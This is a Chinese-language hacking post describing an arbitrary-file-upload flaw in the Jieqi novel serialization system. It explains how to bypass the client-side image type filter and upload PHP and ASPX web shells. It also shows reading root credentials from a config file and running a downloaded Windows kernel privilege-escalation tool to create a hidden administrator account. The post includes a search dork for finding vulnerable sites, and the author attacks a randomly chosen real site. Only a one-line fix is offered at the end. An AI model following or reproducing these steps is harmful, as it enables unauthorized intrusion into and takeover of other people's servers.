杰奇小说连载系统任意文件上传0day+最新windows提权0day工具应用.

杰奇小说连载系统任意文件上传0day
注册用户
进入空间-相册-上传
用oprea活firefox修改源码
有个*.jpg *.gif的地方改成*。*就能上传任意文件
关键字：inurl:modules/space

百度了下 发现有一堆 随便找了一个
注册帐号…登陆之.
在网站后面输入modules/space/space.php 进入空间
 

点相册

然后在点 上传照片
也可以直接在网站后面输入modules/space/upalbum.php
进行图片上传

在上传之前先下载个oprea…
在图片上传页面 右键 源代码 ctrl+f 搜索.jpg

file_types : “*.jpg;*.jpeg;*.gif;*.png;*.bmp”,
把这行代码中的*.jpg;*.jpeg;*.gif;*.png;*.bmp  改为*.*
点应用更改。(ctrl+r)

返回刚才的页面 点浏览图片
文件类型为images(*.*)
直接选中 一句话

哦了。返回相册查看图片地址
http://www.xxx.com/files/space/attachment/image/2/2437/b_59.php
上php大马  在config目录下system.php文件中找到了root。
udf提权… 汗！~~ 插件被杀 没法导出。
上个aspx 大马看支持不。
#89  OK  支持。
对了，今天才下载了个 2003提权的工具 试试。
貌似是小A做的。

工具下载地址：

http://u.115.com/file/bh1utm6g
C:\RECYCLER\k.exe
上传之。
Windows Kernel Local Privilege Exploit Usage:system_exp.exe “cmd”
运行后显示的
用法和pr一样。C:\RECYCLER\k.exe “net user kook$ kook/add”

OK 登陆成功看下配置。4H4G…
简单修复下吧！~
files/ 把该目录的权限修改成无 即可